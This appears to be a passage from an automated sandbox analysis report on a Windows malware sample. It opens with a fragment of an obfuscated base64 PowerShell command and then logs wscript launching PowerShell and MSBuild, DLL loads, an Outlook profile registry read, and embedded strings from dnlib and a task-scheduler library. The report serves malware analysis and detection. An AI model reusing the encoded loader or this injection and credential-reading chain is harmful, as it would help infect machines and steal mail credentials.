aQBsAGQAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAQwA6AFwAVQBzAGUAcgBzAFwAUAB1AGIAbABpAGMAXABEAG8AdwBuAGwAbwBhAGQAcwAnACwAJwBxAHUAZQByAHUAbABvAHUAcwBuAGUAcwBzAGUAcwAnACwAJwBqAHMAJwAsACcAJwAsACcAJwAsACcAYwBlAG4AdABpAG0AZQB0AHIAaQBjACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$alJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `2microsoft.win32.taskschedulercalendartriggermicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotvirtualmachinedetectordnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `1dnlib.dotnet.emitexceptionhandlertypednlib.dotnet.pdb.managedsymbolreadercreatordnlib.dotnetmoduledefuserdnlib.dotnetgenericparamconstraintuserdnlib.dotnetparamdefdnlib.dotnet.mdrawtypedefrowdnlib.dotnet.resourcescreateresourcedatadelegatednlib.dotnetvtableflagsdnlib.dotnet.mdrawinterfaceimplrowdnlib.dotnet.writeriheapdnlib.dotnet.mdmetadataheader source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1579534878.000001E8AA250000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1550336005.000001E8A2B66000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `1dnlib.dotnet.writermodulewriteroptionsbasednlib.dotnet.pdb.dssisymunmanagedwriter2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.ioloaderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.d
                      Source: Binary string: dnlib.dotnet.pdb.managedpdbexception source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocaldnlib.dotneticontainsgenericparameterdnlib.dotnetitokenoperanddnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixups source: powershell.exe, 0000000A.00000002.1587182365.00007FF88AAE4000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: `5dnlib.dotnetdeclsecuritydnlib.dotnet.writermdtablewriterdnlib.dotnetparamdefuserdnlib.dotnetframeworkredirectdnlib.dotnet.mdguidstreamdnlib.dotnet.writernativemodulewriteroptionsmemorymappedionotsupportedexceptiondnlib.dotnetmemberfindermicrosoft.win32.taskschedulertaskeventwatchermicrosoft.win32.taskschedulermonthsoftheyeardnlib.dotnetgenericinstsigmicrosoft.win32.taskschedulertaskservicednlib.dotnet.pdbsymbolwritercreatordnlib.dotnetihasconstantdnlib.peimagefileheaderdnlib.dotnetmethodsemanticsattributesdnlib.dotnetfileattributesdnlib.dotnetityperesolverdnlib.dotnetimplmapuserdnlib.dotnetmdtokensystem.runtime.compilerservicesextensionattributednlib.dotnet.writerichunkdnlib.dotnetmethodattributesdnlib.dotnet.writeriwritererrordnlib.dotnet.resourcesuserresourcedatadnlib.dotnetnullresolverdnlib.dotnet.writerstringsheapdnlib.dotnet.writerpeheadersdnlib.dotnetimplmapdnlib.dotnet.pdb.dssisymunmanageddocumentwriterdnlib.dotnet.mdheaptypednlib.dotnetidnlibdefdnlib.dotnetcustomattributemicrosoft.win32.taskscheduler.fluentactionbuilderdnlib.dotnet.mdrawmemberrefrowdnlib.utilsmfunc`3dnlib.dotnet.mdrawexportedtyperowdnlib.dotnet